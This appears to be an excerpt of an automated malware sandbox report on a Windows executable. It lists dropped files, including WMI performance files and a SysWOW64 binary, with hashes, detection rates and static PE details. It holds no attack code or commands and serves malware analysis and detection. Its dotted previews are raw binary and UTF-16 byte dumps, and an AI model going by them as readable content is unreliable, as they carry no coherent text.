                                                                                                              SHA-512:27812A9A034D7BD2CA73B337AE9E0B6DC79C38CFD1A2C6AC9D125D3CC8FA563C401A40D22155811D5054E5BAA8CF8C8E7E03925F25FA856A9BA9DEA708D15B4E
                                                                                                              Malicious:true
                                                                                                              Antivirus:
                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                              • Antivirus: ReversingLabs, Detection: 97%
                                                                                                              Joe Sandbox View:
                                                                                                              • Filename: ib.exe, Detection: malicious, Browse
                                                                                                              • Filename: SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe, Detection: malicious, Browse
                                                                                                              • Filename: 8VB4lVuZk3.exe, Detection: malicious, Browse
                                                                                                              • Filename: biKy3nZEyJ.exe, Detection: malicious, Browse
                                                                                                              • Filename: biKy3nZEyJ.exe, Detection: malicious, Browse
                                                                                                              • Filename: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, Detection: malicious, Browse
                                                                                                              • Filename: a4#Uff09.exe, Detection: malicious, Browse
                                                                                                              • Filename: 1.0.0.2.exe, Detection: malicious, Browse
                                                                                                              • Filename: log1.exe, Detection: malicious, Browse
                                                                                                              • Filename: log2.exe, Detection: malicious, Browse
                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......z.I.>.'.>.'.>.'..7\.2.'...(.?.'.>.&.y.'.Q.#.=.'..).?.'.7...6.'.7...?.'.Rich>.'.................PE..L...JG.R.............................`.......0....@.......................................@..................................p...............................o.......................................................................................text.... ..........................`....rdata.......0......................@....data........@......................@....reloc.......P.......(..............@....aspack.. ...`.......,..............`....adata...............>..............@...................................................................................................................................................................................................................................................................................................

                                                                                                              C:\Windows\INF\WmiApRpl\WmiApRpl.h

                                                                                                              Download File
                                                                                                              Process:C:\Windows\System32\wbem\WMIADAP.exe
                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):3444
                                                                                                              Entropy (8bit):5.011954215267298
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:48:ADPo+gDMIuK54DeHNg9dqbEzCJGGgGDU3XgLBgaGKFijiVJtVAAF/XRgW:ADw+gDMhK54qHC7aBvGKFijiV7XRgW
                                                                                                              MD5:B133A676D139032A27DE3D9619E70091
                                                                                                              SHA1:1248AA89938A13640252A79113930EDE2F26F1FA
                                                                                                              SHA-256:AE2B6236D3EEB4822835714AE9444E5DCD21BC60F7A909F2962C43BC743C7B15
                                                                                                              SHA-512:C6B99E13D854CE7A6874497473614EE4BD81C490802783DB1349AB851CD80D1DC06DF8C1F6E434ABA873A5BBF6125CC64104709064E19A9DC1C66DCDE3F898F5
                                                                                                              Malicious:false
                                                                                                              Preview://////////////////////////////////////////////////////////////////////////////////////////////..//..// Copyright (C) 2000 Microsoft Corporation..//..// Module Name:..// WmiApRpl..//..// Abstract:..//..// Include file for object and counters definitions...//..//////////////////////////////////////////////////////////////////////////////////////////////......#define.WMI_Objects.0..#define.HiPerf_Classes.2..#define.HiPerf_Validity.4....#define.MSiSCSI_ConnectionStatistics_00000.6....#define.BytesReceived_00000.8..#define.BytesSent_00000.10..#define.PDUCommandsSent_00000.12..#define.PDUResponsesReceived_00000.14....#define.MSiSCSI_InitiatorInstanceStatistics_00001.16....#define.SessionConnectionTimeoutErrorCount_00001.18..#define.SessionDigestErrorCount_00001.20..#define.SessionFailureCount_00001.22..#define.SessionFormatErrorCount_00001.24....#define.MSiSCSI_InitiatorLoginStatistics_00002.26....#define.LoginAcceptRsps_00002.28..#define.LoginAuthenticateFails_00002.30..#define.LoginAuthFai

                                                                                                              C:\Windows\INF\WmiApRpl\WmiApRpl.ini

                                                                                                              Download File
                                                                                                              Process:C:\Windows\System32\wbem\WMIADAP.exe
                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with very long lines (405), with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):48786
                                                                                                              Entropy (8bit):3.5854495362228453
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:384:esozoNc1+12zG1+b61ubSGMLVrj4+PtC81ZBg4Lg4ung4og4uo91K91zI91K91z2:esozozBg4Lg4ung4og4uWG4MG4o1
                                                                                                              MD5:DF877BEC5C9E3382E94FEA48FEE049AC
                                                                                                              SHA1:1D61436C8A1C057C1B1089EB794D90EE4B0D8FE9
                                                                                                              SHA-256:7F0F3FA64E41A30BACA377B6399F8F7087BC54DA9FCA876BFDC2C2EEECA8454B
                                                                                                              SHA-512:433CB16EBE2292CB60CB8CE71207EBB752295FB73E6D13E215E771EC5FC433EE29577AF28641255810C18078B95F04A9D37734B6F49CB6A6302821E365672205
                                                                                                              Malicious:false
                                                                                                              Preview:.././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././....././....././. .C.o.p.y.r.i.g.h.t. .(.C.). .2.0.0.0. .M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n....././....././. .M.o.d.u.l.e. .N.a.m.e.:....././. .W.m.i.A.p.R.p.l....././....././. .A.b.s.t.r.a.c.t.:....././....././. .D.e.s.c.r.i.b.e.s. .a.l.l. .t.h.e. .c.o.u.n.t.e.r.s. .s.u.p.p.o.r.t.e.d. .v.i.a. .W.M.I. .H.i.-.P.e.r.f.o.r.m.a.n.c.e. .p.r.o.v.i.d.e.r.s....././....././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.............[.i.n.f.o.].....d.r.i.v.e.r.n.a.m.e.=.W.m.i.A.p.R.p.l.....s.y.m.b.o.l.f.i.l.e.=.W.m.i.A.p.R.p.l...h.........[.l.a.n.g.u.a.g.e.s.].....0.0.9.=.E.n.g.l.i.s.h.....0.0.9.=.E.n.g.l.i.s.h.........[.o.b.j.e.c.t.s.].....W.M.I._.O.b.j.e.c.t.s._.0.0.

                                                                                                              C:\Windows\SysWOW64\SySyeu.exe

                                                                                                              Download File
                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):61440
                                                                                                              Entropy (8bit):6.199746098562656
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:1536:H9ykYCTdiHQKrFXmw2RQln5IUmDjoX6+:HlMHprF2nRQln5I
                                                                                                              MD5:889B99C52A60DD49227C5E485A016679
                                                                                                              SHA1:8FA889E456AA646A4D0A4349977430CE5FA5E2D7
                                                                                                              SHA-256:6CBE0E1F046B13B29BFA26F8B368281D2DDA7EB9B718651D5856F22CC3E02910
                                                                                                              SHA-512:08933106EAF338DD119C45CBF1F83E723AFF77CC0F8D3FC84E36253B1EB31557A54211D1D5D1CB58958188E32064D451F6C66A24B3963CCCD3DE07299AB90641
                                                                                                              Malicious:false
                                                                                                              Antivirus:
                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........i.....^...^...^.pb^...^.c._...^.c._...^...^c..^.c._...^.c._...^.c._...^.c.^...^.c._...^Rich...^........PE..L...9..j.................b...........a............@..........................@............@.............................................hg...................0..........T........................... ........................m..`....................text...La.......b.................. ..`.data................f..............@....idata...............h..............@..@.didat...............~..............@....rsrc...hg.......h..................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                              C:\Windows\System32\PerfStringBackup.INI

                                                                                                              Download File
                                                                                                              Process:C:\Windows\System32\wbem\WMIADAP.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):840878
                                                                                                              Entropy (8bit):3.4224066455051885
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3072:xJQGb/6IPolY/OhyIGmZkzTMWcnqgspmTbQiIJEDc3dv+eBrq2Bw+1wQ5xcEkc7+:01nqgsp2gOKih3
                                                                                                              MD5:D3ED23A3E63ACA8CF656C585568DA6D7
                                                                                                              SHA1:1A499D7E9A030D53B2A4DBD36F6F14B6531A6094
                                                                                                              SHA-256:AE5A6E258A41298BE6CF2B3DA812E992E1D6A3C7FBC7DD4AA8B413DA850E8B65
                                                                                                              SHA-512:21E2953B0819567865DA9C80A7D07021D7ED48F4BA3CD843C42D13D18E0E8FB27FA2F7C4EC86D4A1F4D887146F0F7E9E05B6A53D85398EA43240C2E180D52E00
                                                                                                              Malicious:false
                                                                                                              Preview:........[.P.e.r.f.l.i.b.].....B.a.s.e. .I.n.d.e.x.=.1.8.4.7.....L.a.s.t. .C.o.u.n.t.e.r.=.1.0.1.2.2.....L.a.s.t. .H.e.l.p.=.1.0.1.2.3.........[.P.E.R.F._...N.E.T. .C.L.R. .D.a.t.a.].....F.i.r.s.t. .C.o.u.n.t.e.r.=.6.8.4.0.....F.i.r.s.t. .H.e.l.p.=.6.8.4.1.....L.a.s.t. .C.o.u.n.t.e.r.=.6.8.5.2.....L.a.s.t. .H.e.l.p.=.6.8.5.3.........[.P.E.R.F._...N.E.T. .C.L.R. .N.e.t.w.o.r.k.i.n.g.].....F.i.r.s.t. .C.o.u.n.t.e.r.=.6.8.2.8.....F.i.r.s.t. .H.e.l.p.=.6.8.2.9.....L.a.s.t. .C.o.u.n.t.e.r.=.6.8.3.8.....L.a.s.t. .H.e.l.p.=.6.8.3.9.........[.P.E.R.F._...N.E.T. .C.L.R. .N.e.t.w.o.r.k.i.n.g. .4...0...0...0.].....F.i.r.s.t. .C.o.u.n.t.e.r.=.6.9.0.0.....F.i.r.s.t. .H.e.l.p.=.6.9.0.1.....L.a.s.t. .C.o.u.n.t.e.r.=.6.9.2.6.....L.a.s.t. .H.e.l.p.=.6.9.2.7.........[.P.E.R.F._...N.E.T. .D.a.t.a. .P.r.o.v.i.d.e.r. .f.o.r. .O.r.a.c.l.e.].....F.i.r.s.t. .C.o.u.n.t.e.r.=.8.9.1.6.....F.i.r.s.t. .H.e.l.p.=.8.9.1.7.....L.a.s.t. .C.o.u.n.t.e.r.=.8.9.4.4.....L.a.s.t. .H.e.l.p.=.8.9.4.5.........[.P.E.R.F._...N.E.

                                                                                                              C:\Windows\System32\PerfStringBackup.TMP

                                                                                                              Download File
                                                                                                              Process:C:\Windows\System32\wbem\WMIADAP.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):840878
                                                                                                              Entropy (8bit):3.4224066455051885
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3072:xJQGb/6IPolY/OhyIGmZkzTMWcnqgspmTbQiIJEDc3dv+eBrq2Bw+1wQ5xcEkc7+:01nqgsp2gOKih3
                                                                                                              MD5:D3ED23A3E63ACA8CF656C585568DA6D7
                                                                                                              SHA1:1A499D7E9A030D53B2A4DBD36F6F14B6531A6094
                                                                                                              SHA-256:AE5A6E258A41298BE6CF2B3DA812E992E1D6A3C7FBC7DD4AA8B413DA850E8B65
                                                                                                              SHA-512:21E2953B0819567865DA9C80A7D07021D7ED48F4BA3CD843C42D13D18E0E8FB27FA2F7C4EC86D4A1F4D887146F0F7E9E05B6A53D85398EA43240C2E180D52E00
                                                                                                              Malicious:false
                                                                                                              Preview:........[.P.e.r.f.l.i.b.].....B.a.s.e. .I.n.d.e.x.=.1.8.4.7.....L.a.s.t. .C.o.u.n.t.e.r.=.1.0.1.2.2.....L.a.s.t. .H.e.l.p.=.1.0.1.2.3.........[.P.E.R.F._...N.E.T. .C.L.R. .D.a.t.a.].....F.i.r.s.t. .C.o.u.n.t.e.r.=.6.8.4.0.....F.i.r.s.t. .H.e.l.p.=.6.8.4.1.....L.a.s.t. .C.o.u.n.t.e.r.=.6.8.5.2.....L.a.s.t. .H.e.l.p.=.6.8.5.3.........[.P.E.R.F._...N.E.T. .C.L.R. .N.e.t.w.o.r.k.i.n.g.].....F.i.r.s.t. .C.o.u.n.t.e.r.=.6.8.2.8.....F.i.r.s.t. .H.e.l.p.=.6.8.2.9.....L.a.s.t. .C.o.u.n.t.e.r.=.6.8.3.8.....L.a.s.t. .H.e.l.p.=.6.8.3.9.........[.P.E.R.F._...N.E.T. .C.L.R. .N.e.t.w.o.r.k.i.n.g. .4...0...0...0.].....F.i.r.s.t. .C.o.u.n.t.e.r.=.6.9.0.0.....F.i.r.s.t. .H.e.l.p.=.6.9.0.1.....L.a.s.t. .C.o.u.n.t.e.r.=.6.9.2.6.....L.a.s.t. .H.e.l.p.=.6.9.2.7.........[.P.E.R.F._...N.E.T. .D.a.t.a. .P.r.o.v.i.d.e.r. .f.o.r. .O.r.a.c.l.e.].....F.i.r.s.t. .C.o.u.n.t.e.r.=.8.9.1.6.....F.i.r.s.t. .H.e.l.p.=.8.9.1.7.....L.a.s.t. .C.o.u.n.t.e.r.=.8.9.4.4.....L.a.s.t. .H.e.l.p.=.8.9.4.5.........[.P.E.R.F._...N.E.

                                                                                                              C:\Windows\System32\perfc009.dat

                                                                                                              Download File
                                                                                                              Process:C:\Windows\System32\wbem\WMIADAP.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):137550
                                                                                                              Entropy (8bit):3.409189992022338
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:1536:X1i4nfw8ld9+mRDaUR28oV7TYfXLi7NwrgSwNu56FRtg:XBnfw8ld9+mRDaUR28oV7TY+7S0ba
                                                                                                              MD5:084B771A167854C5B38E25D4E199B637
                                                                                                              SHA1:AE6D36D4EC5A9E515E8735525BD80C96AC0F8122
                                                                                                              SHA-256:B3CF0050FAF325C36535D665C24411F3877E3667904DFE9D8A1C802ED4BCD56D
                                                                                                              SHA-512:426C15923F54EC93F22D9523B5CB6D326F727A34F5FF2BDE63D1CB3AD97CAB7E5B2ABABBC6ED5082B5E3140E9342A4E6F354359357A3F9AEF285278CB38A5835
                                                                                                              Malicious:false
                                                                                                              Preview:1...1.8.4.7...2...S.y.s.t.e.m...4...M.e.m.o.r.y...6...%. .P.r.o.c.e.s.s.o.r. .T.i.m.e...1.0...F.i.l.e. .R.e.a.d. .O.p.e.r.a.t.i.o.n.s./.s.e.c...1.2...F.i.l.e. .W.r.i.t.e. .O.p.e.r.a.t.i.o.n.s./.s.e.c...1.4...F.i.l.e. .C.o.n.t.r.o.l. .O.p.e.r.a.t.i.o.n.s./.s.e.c...1.6...F.i.l.e. .R.e.a.d. .B.y.t.e.s./.s.e.c...1.8...F.i.l.e. .W.r.i.t.e. .B.y.t.e.s./.s.e.c...2.0...F.i.l.e. .C.o.n.t.r.o.l. .B.y.t.e.s./.s.e.c...2.4...A.v.a.i.l.a.b.l.e. .B.y.t.e.s...2.6...C.o.m.m.i.t.t.e.d. .B.y.t.e.s...2.8...P.a.g.e. .F.a.u.l.t.s./.s.e.c...3.0...C.o.m.m.i.t. .L.i.m.i.t...3.2...W.r.i.t.e. .C.o.p.i.e.s./.s.e.c...3.4...T.r.a.n.s.i.t.i.o.n. .F.a.u.l.t.s./.s.e.c...3.6...C.a.c.h.e. .F.a.u.l.t.s./.s.e.c...3.8...D.e.m.a.n.d. .Z.e.r.o. .F.a.u.l.t.s./.s.e.c...4.0...P.a.g.e.s./.s.e.c...4.2...P.a.g.e. .R.e.a.d.s./.s.e.c...4.4...P.r.o.c.e.s.s.o.r. .Q.u.e.u.e. .L.e.n.g.t.h...4.6...T.h.r.e.a.d. .S.t.a.t.e...4.8...P.a.g.e.s. .O.u.t.p.u.t./.s.e.c...5.0...P.a.g.e. .W.r.i.t.e.s./.s.e.c...5.2...B.r.o.w.s.e.r...5.4...A.n.n.o.u.

                                                                                                              C:\Windows\System32\perfh009.dat

                                                                                                              Download File
                                                                                                              Process:C:\Windows\System32\wbem\WMIADAP.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):715050
                                                                                                              Entropy (8bit):3.278818886805871
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3072:NUdGNuowE4j0PrRZnpETMDZ8M6d0PHHx643/A5BK9YXdhPHlVziwC4ALWI1dnmRh:78M6d0w+WB6I
                                                                                                              MD5:342BC94F85E143BE85B5B997163A0BB3
                                                                                                              SHA1:8780CD88D169AE88C843E19239D9A32625F6A73E
                                                                                                              SHA-256:F7D40B4FADA44B2A5231780F99C3CE784BCF33866B59D5EB767EEA8E532AD2C4
                                                                                                              SHA-512:0A4ED9104CAFCE95E204B5505181816E7AA7941DED2694FF75EFABAAB821BF0F0FE5B32261ED213C710250B7845255F4E317D86A3A6D4C2C21F866207233C57E
                                                                                                              Malicious:false
                                                                                                              Preview:3...T.h.e. .S.y.s.t.e.m. .p.e.r.f.o.r.m.a.n.c.e. .o.b.j.e.c.t. .c.o.n.s.i.s.t.s. .o.f. .c.o.u.n.t.e.r.s. .t.h.a.t. .a.p.p.l.y. .t.o. .m.o.r.e. .t.h.a.n. .o.n.e. .i.n.s.t.a.n.c.e. .o.f. .a. .c.o.m.p.o.n.e.n.t. .p.r.o.c.e.s.s.o.r.s. .o.n. .t.h.e. .c.o.m.p.u.t.e.r.....5...T.h.e. .M.e.m.o.r.y. .p.e.r.f.o.r.m.a.n.c.e. .o.b.j.e.c.t. . .c.o.n.s.i.s.t.s. .o.f. .c.o.u.n.t.e.r.s. .t.h.a.t. .d.e.s.c.r.i.b.e. .t.h.e. .b.e.h.a.v.i.o.r. .o.f. .p.h.y.s.i.c.a.l. .a.n.d. .v.i.r.t.u.a.l. .m.e.m.o.r.y. .o.n. .t.h.e. .c.o.m.p.u.t.e.r... . .P.h.y.s.i.c.a.l. .m.e.m.o.r.y. .i.s. .t.h.e. .a.m.o.u.n.t. .o.f. .r.a.n.d.o.m. .a.c.c.e.s.s. .m.e.m.o.r.y. .o.n. .t.h.e. .c.o.m.p.u.t.e.r... . .V.i.r.t.u.a.l. .m.e.m.o.r.y. .c.o.n.s.i.s.t.s. .o.f. .t.h.e. .s.p.a.c.e. .i.n. .p.h.y.s.i.c.a.l. .m.e.m.o.r.y. .a.n.d. .o.n. .d.i.s.k... . .M.a.n.y. .o.f. .t.h.e. .m.e.m.o.r.y. .c.o.u.n.t.e.r.s. .m.o.n.i.t.o.r. .p.a.g.i.n.g.,. .w.h.i.c.h. .i.s. .t.h.e. .m.o.v.e.m.e.n.t. .o.f. .p.a.g.e.s. .o.f. .c.o.d.e. .a.n.d. .d.a.t.a. .b.e.t.

                                                                                                              C:\Windows\System32\wbem\Performance\WmiApRpl_new.h

                                                                                                              Download File
                                                                                                              Process:C:\Windows\System32\wbem\WMIADAP.exe
                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):3444
                                                                                                              Entropy (8bit):5.011954215267298
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:48:ADPo+gDMIuK54DeHNg9dqbEzCJGGgGDU3XgLBgaGKFijiVJtVAAF/XRgW:ADw+gDMhK54qHC7aBvGKFijiV7XRgW
                                                                                                              MD5:B133A676D139032A27DE3D9619E70091
                                                                                                              SHA1:1248AA89938A13640252A79113930EDE2F26F1FA
                                                                                                              SHA-256:AE2B6236D3EEB4822835714AE9444E5DCD21BC60F7A909F2962C43BC743C7B15
                                                                                                              SHA-512:C6B99E13D854CE7A6874497473614EE4BD81C490802783DB1349AB851CD80D1DC06DF8C1F6E434ABA873A5BBF6125CC64104709064E19A9DC1C66DCDE3F898F5
                                                                                                              Malicious:false
                                                                                                              Preview://////////////////////////////////////////////////////////////////////////////////////////////..//..// Copyright (C) 2000 Microsoft Corporation..//..// Module Name:..// WmiApRpl..//..// Abstract:..//..// Include file for object and counters definitions...//..//////////////////////////////////////////////////////////////////////////////////////////////......#define.WMI_Objects.0..#define.HiPerf_Classes.2..#define.HiPerf_Validity.4....#define.MSiSCSI_ConnectionStatistics_00000.6....#define.BytesReceived_00000.8..#define.BytesSent_00000.10..#define.PDUCommandsSent_00000.12..#define.PDUResponsesReceived_00000.14....#define.MSiSCSI_InitiatorInstanceStatistics_00001.16....#define.SessionConnectionTimeoutErrorCount_00001.18..#define.SessionDigestErrorCount_00001.20..#define.SessionFailureCount_00001.22..#define.SessionFormatErrorCount_00001.24....#define.MSiSCSI_InitiatorLoginStatistics_00002.26....#define.LoginAcceptRsps_00002.28..#define.LoginAuthenticateFails_00002.30..#define.LoginAuthFai

                                                                                                              C:\Windows\System32\wbem\Performance\WmiApRpl_new.ini

                                                                                                              Download File
                                                                                                              Process:C:\Windows\System32\wbem\WMIADAP.exe
                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with very long lines (405), with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):48786
                                                                                                              Entropy (8bit):3.5854495362228453
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:384:esozoNc1+12zG1+b61ubSGMLVrj4+PtC81ZBg4Lg4ung4og4uo91K91zI91K91z2:esozozBg4Lg4ung4og4uWG4MG4o1
                                                                                                              MD5:DF877BEC5C9E3382E94FEA48FEE049AC
                                                                                                              SHA1:1D61436C8A1C057C1B1089EB794D90EE4B0D8FE9
                                                                                                              SHA-256:7F0F3FA64E41A30BACA377B6399F8F7087BC54DA9FCA876BFDC2C2EEECA8454B
                                                                                                              SHA-512:433CB16EBE2292CB60CB8CE71207EBB752295FB73E6D13E215E771EC5FC433EE29577AF28641255810C18078B95F04A9D37734B6F49CB6A6302821E365672205
                                                                                                              Malicious:false
                                                                                                              Preview:.././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././....././....././. .C.o.p.y.r.i.g.h.t. .(.C.). .2.0.0.0. .M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n....././....././. .M.o.d.u.l.e. .N.a.m.e.:....././. .W.m.i.A.p.R.p.l....././....././. .A.b.s.t.r.a.c.t.:....././....././. .D.e.s.c.r.i.b.e.s. .a.l.l. .t.h.e. .c.o.u.n.t.e.r.s. .s.u.p.p.o.r.t.e.d. .v.i.a. .W.M.I. .H.i.-.P.e.r.f.o.r.m.a.n.c.e. .p.r.o.v.i.d.e.r.s....././....././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.............[.i.n.f.o.].....d.r.i.v.e.r.n.a.m.e.=.W.m.i.A.p.R.p.l.....s.y.m.b.o.l.f.i.l.e.=.W.m.i.A.p.R.p.l...h.........[.l.a.n.g.u.a.g.e.s.].....0.0.9.=.E.n.g.l.i.s.h.....0.0.9.=.E.n.g.l.i.s.h.........[.o.b.j.e.c.t.s.].....W.M.I._.O.b.j.e.c.t.s._.0.0.

                                                                                                              C:\Windows\appcompat\Programs\Amcache.hve

                                                                                                              Download File
                                                                                                              Process:C:\Users\user\AppData\Local\Temp\XekSuT.exe
                                                                                                              File Type:MS Windows registry file, NT/2000 or above
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1835008
                                                                                                              Entropy (8bit):4.465989311726786
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:6144:zIXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uNOdwBCswSbn:kXD94+WlLZMM6YFHE+n
                                                                                                              MD5:25261D3F857EF0D116461DEBDCC93547
                                                                                                              SHA1:324A6B84B8934EFDAA000DC83FED7F971BCCB200
                                                                                                              SHA-256:A64C9C3EC478670517DE98DC60C017626CBF51FE35398ACB074941C9E3E52032
                                                                                                              SHA-512:1E70E8A570213FE60B81151896D61D063D773CDDBC2D042E65B55D46058918D9A5D0715A172447DBE88473B9EE08A0CA431452A069C4D029264C8D1B9E5DC10E
                                                                                                              Malicious:false
                                                                                                              Preview:regf7...7....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmVt4,.)...............................................................................................................................................................................................................................................................................................................................................7".........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                              C:\Windows\system32\wbem\Performance\WmiApRpl.h (copy)

                                                                                                              Download File
                                                                                                              Process:C:\Windows\System32\wbem\WMIADAP.exe
                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):3444
                                                                                                              Entropy (8bit):5.011954215267298
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:48:ADPo+gDMIuK54DeHNg9dqbEzCJGGgGDU3XgLBgaGKFijiVJtVAAF/XRgW:ADw+gDMhK54qHC7aBvGKFijiV7XRgW
                                                                                                              MD5:B133A676D139032A27DE3D9619E70091
                                                                                                              SHA1:1248AA89938A13640252A79113930EDE2F26F1FA
                                                                                                              SHA-256:AE2B6236D3EEB4822835714AE9444E5DCD21BC60F7A909F2962C43BC743C7B15
                                                                                                              SHA-512:C6B99E13D854CE7A6874497473614EE4BD81C490802783DB1349AB851CD80D1DC06DF8C1F6E434ABA873A5BBF6125CC64104709064E19A9DC1C66DCDE3F898F5
                                                                                                              Malicious:false
                                                                                                              Preview://////////////////////////////////////////////////////////////////////////////////////////////..//..// Copyright (C) 2000 Microsoft Corporation..//..// Module Name:..// WmiApRpl..//..// Abstract:..//..// Include file for object and counters definitions...//..//////////////////////////////////////////////////////////////////////////////////////////////......#define.WMI_Objects.0..#define.HiPerf_Classes.2..#define.HiPerf_Validity.4....#define.MSiSCSI_ConnectionStatistics_00000.6....#define.BytesReceived_00000.8..#define.BytesSent_00000.10..#define.PDUCommandsSent_00000.12..#define.PDUResponsesReceived_00000.14....#define.MSiSCSI_InitiatorInstanceStatistics_00001.16....#define.SessionConnectionTimeoutErrorCount_00001.18..#define.SessionDigestErrorCount_00001.20..#define.SessionFailureCount_00001.22..#define.SessionFormatErrorCount_00001.24....#define.MSiSCSI_InitiatorLoginStatistics_00002.26....#define.LoginAcceptRsps_00002.28..#define.LoginAuthenticateFails_00002.30..#define.LoginAuthFai

                                                                                                              C:\Windows\system32\wbem\Performance\WmiApRpl.ini (copy)

                                                                                                              Download File
                                                                                                              Process:C:\Windows\System32\wbem\WMIADAP.exe
                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with very long lines (405), with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):48786
                                                                                                              Entropy (8bit):3.5854495362228453
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:384:esozoNc1+12zG1+b61ubSGMLVrj4+PtC81ZBg4Lg4ung4og4uo91K91zI91K91z2:esozozBg4Lg4ung4og4uWG4MG4o1
                                                                                                              MD5:DF877BEC5C9E3382E94FEA48FEE049AC
                                                                                                              SHA1:1D61436C8A1C057C1B1089EB794D90EE4B0D8FE9
                                                                                                              SHA-256:7F0F3FA64E41A30BACA377B6399F8F7087BC54DA9FCA876BFDC2C2EEECA8454B
                                                                                                              SHA-512:433CB16EBE2292CB60CB8CE71207EBB752295FB73E6D13E215E771EC5FC433EE29577AF28641255810C18078B95F04A9D37734B6F49CB6A6302821E365672205
                                                                                                              Malicious:false
                                                                                                              Preview:.././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././....././....././. .C.o.p.y.r.i.g.h.t. .(.C.). .2.0.0.0. .M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n....././....././. .M.o.d.u.l.e. .N.a.m.e.:....././. .W.m.i.A.p.R.p.l....././....././. .A.b.s.t.r.a.c.t.:....././....././. .D.e.s.c.r.i.b.e.s. .a.l.l. .t.h.e. .c.o.u.n.t.e.r.s. .s.u.p.p.o.r.t.e.d. .v.i.a. .W.M.I. .H.i.-.P.e.r.f.o.r.m.a.n.c.e. .p.r.o.v.i.d.e.r.s....././....././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.............[.i.n.f.o.].....d.r.i.v.e.r.n.a.m.e.=.W.m.i.A.p.R.p.l.....s.y.m.b.o.l.f.i.l.e.=.W.m.i.A.p.R.p.l...h.........[.l.a.n.g.u.a.g.e.s.].....0.0.9.=.E.n.g.l.i.s.h.....0.0.9.=.E.n.g.l.i.s.h.........[.o.b.j.e.c.t.s.].....W.M.I._.O.b.j.e.c.t.s._.0.0.

                                                                                                              Static File Info

                                                                                                              General

                                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                              Entropy (8bit):5.561740167718479
                                                                                                              TrID:
                                                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                              File name:gE4NVCZDRk.exe
                                                                                                              File size:69'632 bytes
                                                                                                              MD5:02b3757b29002a8fcabd9afaebf1f7d3
                                                                                                              SHA1:cecffd787a418e435a9019211dda54444c2184fd
                                                                                                              SHA256:e909609bcd7d6a217635b372abba6e55d034d2e55712b032844ce28ded020064
                                                                                                              SHA512:fa7312829ddb66c4e3dba341eb45b2625c45060cfb2265a53ddb54595dd28d9245959eee6065b50e58d1908660732785a0430ae9345455d4bbcefd52fc5b015a
                                                                                                              SSDEEP:1536:sb1MsHz3JDwhyWr+N95OTga6S+PGCq2iW7z:XsT3JezcMCSkGCH
                                                                                                              TLSH:35639E01634460F7C686637266F7A21B885A7EB20BB824CFE7E44D0F1CF49D5B83646B
                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........9..tW..tW..tW..h[..tW..{...tW.DhY..tW..k]..tW..kS..tW..RS..tW..tV.[tW..R\..tW..rQ..tW.Rich.tW.........PE..L....w.T...........

                                                                                                              File Icon

                                                                                                              Icon Hash:71b018dccec77331

                                                                                                              Static PE Info

                                                                                                              General

